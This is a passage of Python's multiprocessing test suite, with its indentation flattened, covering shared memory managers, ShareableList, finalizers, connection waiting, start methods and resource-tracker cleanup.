sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + 60
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + 60
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
